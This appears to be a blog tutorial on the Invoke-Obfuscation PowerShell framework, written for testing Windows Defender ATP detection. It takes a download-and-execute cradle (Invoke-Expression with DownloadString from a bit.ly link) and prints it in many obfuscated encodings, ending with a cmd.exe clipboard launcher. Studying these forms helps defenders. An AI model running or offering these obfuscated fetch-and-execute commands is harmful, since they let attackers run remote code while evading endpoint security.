Invoke-Obfuscation

While testing PowerShell commands with Windows Defender Advanced Threat Protection (WDATP) and preparing for some webinars I am doing in April and May, I spent some time using the framework “Invoke-Obfuscation“. I thought it might be useful to walk-through how to use it and what it can do.

What is “Invoke-Obfuscation”?
“Attackers and commodity malware have started using extremely basic obfuscation techniques to hide most of the commands from the command line arguments of powershell.exe. Daniel Bohannon developed this tool to aid Blue Teams in simulating obfuscated commands based on what he currently knows to be syntactically possible in PowerShell 2.0-5.0 so that they can test their detection capabilities of these techniques.”

Firstly, to use it, you will need to download or fork the following GitHub repository.

https://github.com/danielbohannon/Invoke-Obfuscation

Navigate to the folder you now have extracted the project. Next, you need to use “Import-Module“, to load the framework.

Depending on your security settings for PowerShell, you may need to change the “Execution Policy“, and then accept each dependency as it loads. Once done type “Invoke-Obfuscation“, press “Enter“.

Once it has finished loading you should have the following screen loaded.

The tool is simple to use and has some options available for testing as well as tutorials that can be used. Now that’s loaded, we need to determine the PowerShell commands that we wish to obfuscate. For this example, we can use a simple one that loads a PowerShell script and writes a message.

Invoke-Expression (New-Object System.Net.WebClient).DownloadString(‘http://bit.ly/2GfFXuD’)

Now we have this, let’s look at using “Invoke-Obfuscation” to make it harder to understand. Firstly, we need to use “SET SCRIPTBLOCK” and add the path above.

Press “Enter“, now we need to choose the encoding we wish to use. This done by typing “ENCODING” and pressing “Enter“.

Next, you can choose the type of encoding you want to use for the “scriptblock” you added.

Here is the command from above using each option:

ASCII
. ( $pShoMe[4]+$PsHOmE[34]+’x’)( -joIn (’73<110-118{111I107%101<45m69<120e112%114-101-115{115{105e111<110e32_40H78%101I119_45<79m98q106_101%99e116m32q83I121-115<116q101<109_46%78-101_116_46{87%101I98{67%108q105q101I110{116q41-46<68e111{119-110_108I111I97I100e83q116-114e105-110{103_40m8216m104m116q116-112%58-47<47-98m105I116I46<108H121%47%50e71{102_70H88H117%68m8217I41′.spLit(‘e%_<q{m-IH’ )| % { ( [InT]$_ -as[cHAR]) }))

HEX
&((GET-VARiaBle ‘*Mdr*’).nAME[3,11,2]-JoIN”) ( “$( seT-varIAble ‘oFs’ ”)” +[sTriNg]( ’49&6es76X6fK6bz65}2dX45X78:70X72_65:73s73s69:6f}6es20z28_4e:65X77K2d&4f:62K6a:65_63K74_20z53K79s73X74:65}6dX2e&4ez65}74z2e&57s65K62_43}6c_69z65_6ez74X29K2e_44}6fz77X6e&6cK6fX61:64}53z74s72:69s6e:67}28s2018}68z74&74K70z3aX2f}2f&62:69}74s2es6c:79s2fK32&47z66&46K58K75_44s2019:29′-sPliT’X’-SPlIT ‘_’-sPlIT’z’-SpLIt’s’ -splIT’:’-SPLit’}’ -SPLIT ‘&’ -SPlit ‘K’| ForEACh{( [CHAR] ( [cOnVErT]::TOINt16(( $_.TostRInG()) ,16 ) ))} )+”$( SET-iTEM ‘VaRiABlE:OFs’ ‘ ‘ ) “)

Octal
((111,156, 166, 157, 153,145,55, 105 ,170 ,160,162 , 145 , 163 , 163,151, 157,156 , 40, 50 , 116 , 145 ,167, 55, 117 , 142,152, 145 , 143,164,40 ,123 ,171, 163,164 ,145 , 155,56,116 , 145 ,164, 56 ,127 ,145 ,142,103 , 154, 151,145 , 156 ,164, 51 , 56,104 , 157 ,167 ,156,154 , 157,141, 144,123 , 164 ,162 , 151, 156 , 147 ,50 , 20030 ,150, 164, 164 ,160,72,57 , 57 , 142 ,151 ,164 ,56, 154, 171,57,62,107 ,146,106 ,130, 165 , 104 ,20031 , 51) | fOreACh{( [conVERT]::toInt16(([STRing]$_), 8 ) -as[cHAr]) })-Join” | &( ([stRing]$verBOsEpREfEreNce)[1,3]+’X’-join”)

Binary
-JOin( ‘1001001_1101110I1110110S1101111>1101011_1100101!101101e1000101I1111000c1110000_1110010S1100101>1110011I1110011}1101001!1101111e1101110}100000k101000e1001110S1100101}1110111@101101>1001111I1100010I1101010!1100101_1100011e1110100k100000}1010011k1111001k1110011!1110100k1100101I1101101@101110S1001110!1100101@1110100@101110c1010111_1100101>1100010}1000011S1101100@1101001!1100101e1101110e1110100k101001>101110!1000100e1101111I1110111S1101110k1101100c1101111e1100001c1100100I1010011e1110100S1110010e1101001>1101110@1100111_101000e10000000011000}1101000e1110100I1110100_1110000@111010@101111k101111>1100010c1101001c1110100>101110e1101100c1111001c101111k110010>1000111S1100110}1000110_1011000>1110101k1000100e10000000011001_101001’.spLIT(‘_Ik!@>Sce}’)|fOREACh{ ([coNVeRT]::toInt16(( [STRIng]$_), 2 ) -as[cHaR])} ) | &( ([sTrING]$VERBOSeprefEreNCE)[1,3]+’X’-joiN”)

SecureString (AES)
([RunTimE.InterOpSeRvIcEs.marsHaL]::ptrtoStRinguni( [RUNTIMe.interOPServices.MARsHAL]::sECuREstrINGtoglobAlaLLOCUNIcODE( $(‘76492d1116743f0423413b16050a5345MgB8ADUAQwBpAEwATwBiAGQAUQBEAEEAbQBJAEUAdgBSAFYANQBEAGQAeQB3AGcAPQA9AHwAMgBjAGIANgAxAGUAZAAwADMAYgA3ADgAMQBiADYANQA1AGEANQA1AGUAOAAwAGUAZQAzAGEAYwAzADkANwBiADUAYwA0ADMANwA0ADUANgA4AGYAMABjAGEAMwAwAGUAMgA2ADcAZQAzADIAMgBjADEAYgBiAGYANQBhADIAZAA3ADgAZAAxADgANgBjAGMANQAwAGIANAA5AGMAMABmAGEANQA1AGEANgBmAGYAMQA5ADQANQBjADUANABjADIAMAAyAGEANAAwADEANwA4AGIAZAA2AGMANABhADAANABkADAAMwBiADAANwAyAGEANQAzAGEAZQAwADcAMABlADgANwBlADUAZAA4ADEANgA0ADAAYwAxADEAZgBhADYAOQAwAGQAMQA1AGQANgA2ADMAYQBlADcAMwAwADMAYQBiADUAMAAwADIAYwBhADAAZABiADcAZQBjAGIAMwAwADAAZgBlAGYAOQAxADMAYwBjADUAZgAwAGMAMwBiAGEAYgBlADMAZgA3ADUAZAA2AGIAYwA1AGYAMwBhADMAMAA2AGIAMQBhAGIAMgBlADkAZABlAGIAMQA5ADgAMQBmADkAMABkADcAZQA2ADYANQBmAGUANQBhADYAYgBhADYAMAA2AGQAMAA1ADYAZAA4AGUANgAyADYANQBkAGIANgAzAGMAYQA1AGMANgBiAGQAOABmADAAYQAwADIANgBhADYAYwA2ADkAOABlADQANwBkAGUANgAzAGYANwA0ADYAZgA5ADcANgBhAGYANAAxAGIAMwA4AGEANABkAGMAZgBiADMAOAAwADQAZABiADIANAA2ADIANgBmAGMAMwAwAGIAZABkADMANgBjADQAMQBhADUAZABiADcAYQA5ADAAZgA3ADMAZgBmAGMAOAA3ADgAYwA0AGEANgBkADcAOABmAGQAMwBlAGEAYgBkADAAZABkADkAYgBlADUAMQAwAGMAMwBhAGIAOAAzAGQAOQAzADgANgAwADAAYQA2ADYA’|CoNvertTO-SecUREStRIng -KeY (193..224)) ) )) |INvOKe-EXPrESsion

BXOR
. ( $SHeLLID[1]+$shEllID[13]+’x’) ( (( 22, 49,41 , 48,52, 58,114, 26, 39, 47 ,45, 58, 44, 44,54, 48 ,49,127,119,17 , 58, 40,114,16 , 61 ,53 ,58, 60 , 43, 127 , 12, 38,44,43 , 58,50 ,113,17,58, 43, 113 , 8, 58 , 61 ,28 ,51, 54 , 58,49 ,43 , 118, 113,27 ,48, 40,49 ,51 ,48, 62,59 , 12, 43 , 45 ,54 , 49, 56,119 ,8263, 55 , 43, 43,47,101 , 112 , 112 ,61 ,54,43,113 , 51 , 38,112 ,109, 24, 57 ,25 , 7 , 42, 27 ,8262, 118 )| %{ [CHAR] ($_ -bXoR’0x5f’)})-joIn”)

Special Characters
${!}=+ $();${+)}=${!}; ${=/} = ++ ${!} ; ${“./} =( ${!} =${!} +${=/}) ;${!*} =( ${!} = ${!} +${=/}) ; ${]!#}=(${!} =${!}+ ${=/} ); ${$# }=( ${!}=${!}+ ${=/} ); ${~$}=(${!} = ${!}+${=/} ) ; ${]+}=(${!}=${!} +${=/} );${+~}=( ${!}= ${!} + ${=/}) ; ${@} =(${!}=${!} +${=/}) ;${+}=”[“+ “$(@{} )”[${]+} ] +”$(@{})”[“${=/}${@}”]+”$( @{ })”[ “${“./}${+)}” ] + “$? “[${=/} ] + “]”; ${!}= “”.(“$( @{ } ) “[ “${=/}” +”${]!#}”]+ “$( @{ } )”[ “${=/}”+ “${~$}” ]+”$(@{ })”[ ${+)} ]+ “$( @{} ) “[${]!#} ]+”$?”[ ${=/}] + “$( @{} ) “[ ${!*}]); ${!}= “$(@{} )”[“${=/}${]!#}” ] +”$( @{ } ) “[${]!#} ]+ “${!}”[“${“./}${]+}” ];”${!} ( ${+}${]+}${!*}+${+}${=/}${=/}${+)}+ ${+}${=/}${=/}${+~} +${+}${=/}${=/}${=/} + ${+}${=/}${+)}${]+}+ ${+}${=/}${+)}${=/}+${+}${]!#}${$# }+${+}${~$}${@} + ${+}${=/}${“./}${+)} + ${+}${=/}${=/}${“./} + ${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${=/} +${+}${=/}${=/}${$# } + ${+}${=/}${=/}${$# }+ ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${=/}+ ${+}${=/}${=/}${+)}+ ${+}${!*}${“./} + ${+}${]!#}${+)} + ${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${@}+${+}${]!#}${$# } +${+}${]+}${@} + ${+}${@}${+~} + ${+}${=/}${+)}${~$} + ${+}${=/}${+)}${=/}+${+}${@}${@} + ${+}${=/}${=/}${~$} +${+}${!*}${“./}+ ${+}${+~}${!*}+${+}${=/}${“./}${=/} + ${+}${=/}${=/}${$# }+${+}${=/}${=/}${~$} +${+}${=/}${+)}${=/}+${+}${=/}${+)}${@}+ ${+}${]!#}${~$}+${+}${]+}${+~} +${+}${=/}${+)}${=/} +${+}${=/}${=/}${~$}+${+}${]!#}${~$} + ${+}${+~}${]+} +${+}${=/}${+)}${=/}+ ${+}${@}${+~}+ ${+}${~$}${]+} +${+}${=/}${+)}${+~}+ ${+}${=/}${+)}${$# } +${+}${=/}${+)}${=/} +${+}${=/}${=/}${+)} +${+}${=/}${=/}${~$}+${+}${]!#}${=/} + ${+}${]!#}${~$} + ${+}${~$}${+~}+ ${+}${=/}${=/}${=/}+${+}${=/}${=/}${@}+ ${+}${=/}${=/}${+)} +${+}${=/}${+)}${+~}+ ${+}${=/}${=/}${=/}+${+}${@}${]+}+${+}${=/}${+)}${+)} +${+}${+~}${!*} +${+}${=/}${=/}${~$}+${+}${=/}${=/}${]!#} + ${+}${=/}${+)}${$# } + ${+}${=/}${=/}${+)} + ${+}${=/}${+)}${!*} + ${+}${]!#}${+)} +${+}${+~}${“./}${=/}${~$} + ${+}${=/}${+)}${]!#}+ ${+}${=/}${=/}${~$} + ${+}${=/}${=/}${~$}+${+}${=/}${=/}${“./}+${+}${$# }${+~} +${+}${]!#}${]+} +${+}${]!#}${]+} +${+}${@}${+~}+${+}${=/}${+)}${$# } +${+}${=/}${=/}${~$} + ${+}${]!#}${~$}+ ${+}${=/}${+)}${+~}+${+}${=/}${“./}${=/} + ${+}${]!#}${]+}+${+}${$# }${+)} + ${+}${]+}${=/} + ${+}${=/}${+)}${“./} + ${+}${]+}${+)} +${+}${+~}${+~} + ${+}${=/}${=/}${]+} +${+}${~$}${+~}+ ${+}${+~}${“./}${=/}${]+}+ ${+}${]!#}${=/} ) “| &${!}

Whitespace
‘ ‘|FOREacH{$bFpejQ= $_ -ispLit ‘ ‘| FOREacH { ‘ ‘ ; $_ -ispLit ‘ ‘ |FOREacH { $_.lENGTh -1}};&( $pShOMe[4]+$pShome[34]+’X’)( -joIN (((-joIN( $bFpejQ[0..($bFpejQ.lENGTh-1)]) ).triM( ‘ ‘ ).SpliT(‘ ‘ ) | FOREacH{ ([INT] $_-aS[cHaR])}))) }

I just like looking at them when them when they are encoded. Another option is to use “STRING” instead. You can then choose from the three options:

Choosing the third option changes the command to the following:

$LwFhTO =” ) )’)’+”D’+’u’+’XF’+’fG2/yl’+’.tib//:p’+’tth'(gnir’+’tSda’+’o’+’lnwoD.)tn’+’ei’+’lCbeW’+’.teN.’+’metsyS tcejbO-‘+’w’+’e’+’N(‘+’ ‘+’noi’+’s’+’serp’+’xE’+’-e’+’kov’+’nI'(( )”nIOJ-‘x’+]3,1[)(GNirTsot.eCNEreFERPEsobREv$ (&” ; ” $( Sv ‘OfS’ ”) ” + [stRING] ( ( Gci (‘vArIa’+’b’+’lE:lwFHTO’) ).VaLue[ -1..-(( Gci (‘vArIa’+’b’+’lE:lwFHTO’) ).VaLue.lENgTH ) ])+”$(sET-ITem ‘VariAbLE:OFS’ ‘ ‘ )” |& ( $sHEllId[1]+$ShElliD[13]+’x’)

You can also set the “LAUNCHER” that will run the obfuscated command, by default you can only use it with PowerShell, however setting “LAUNCHER” can change that.

If you choose “CLIP+“, you then get to choose any execution flags that should apply.

For now, I am going to choose “0“. The command is then changed to the following:

cMd.exE /C”ECHo -JOIN( (49, ‘6e’, 76 , ‘6f’ , ‘6b’ , 65,’2d’,45 ,78,70, 72 , 65 , 73, 73,69,’6f’ ,’6e’,20,28 ,’4e’, 65 , 77 ,’2d’ , ‘4f’, 62, ‘6a’ ,65,63 ,74, 20 ,53, 79 ,73,74, 65 ,’6d’, ‘2e’ , ‘4e’, 65 , 74 ,’2e’, 57 , 65, 62 , 43 ,’6c’ ,69 ,65 , ‘6e’ ,74, 29, ‘2e’,44 , ‘6f’ , 77 , ‘6e’ , ‘6c’ ,’6f’ ,61 ,64 ,53, 74, 72, 69 , ‘6e’ ,67, 28 ,2018, 68, 74,74 , 70 ,’3a’ ,’2f’,’2f’ , 62 ,69 ,74,’2e’ ,’6c’ , 79, ‘2f’, 32 ,47, 66,46, 58 ,75 , 44 ,2019 ,29 ) ^^^| foreaCH-OBJeCt{( [ChAr] ( [CoNverT]::toiNt16(($_.TOSTrInG()) ,16) ))}) ^^^|^^^&( $VeRBosePReFErENce.ToStrInG()[1,3]+’x’-joIN”)|Clip && powERShEll -sT ${l`dfo} = [System.Reflection.Assembly]::(\”{2}{1}{0}{3}\” -f ‘i’,( \”{1}{2}{0}\”-f ‘art’,’With’,’P’ ),(\”{1}{0}\” -f’oad’,’L’ ),( \”{1}{2}{0}\” -f’me’,’al’,’Na’ ) ).\”inv`OKe\”(( \”{1}{4}{2}{3}{0}\” -f’s’,’Syst’,’m’,’.Windows.Form’,’e’ ) ) ; ( ^& ( ‘Gv’ ) ( \”{3}{2}{0}{4}{1}\”-f’O’,’t’,’nC’,’eXeCuTio’,’nteX’ ) -valuEoNly).\”invokec`O`mM`AND\”.\”inVOk`es`CRI`PT\”( ( [wINdowS.forms.CLiPBOArd]::( \”{0}{2}{1}\”-f ‘gE’,’XT’,’ttE’).\”i`NVoKE\”() ) ) ; [Windows.Forms.Clipboard]::(\”{1}{0}{2}\”-f ‘tT’,’Se’,’ext’).\”In`VOKe\”(‘ ‘ )”

As you can see it looks very different from the original one we started with. Once you have created it the way that you want it to be, you can then execute locally by using “TEST“. If you have applied a “LAUNCHER” such as “CMD“, then you will not be able to test it.

Taking the above command and running it in a “Command Prompt” executes the PowerShell perfectly.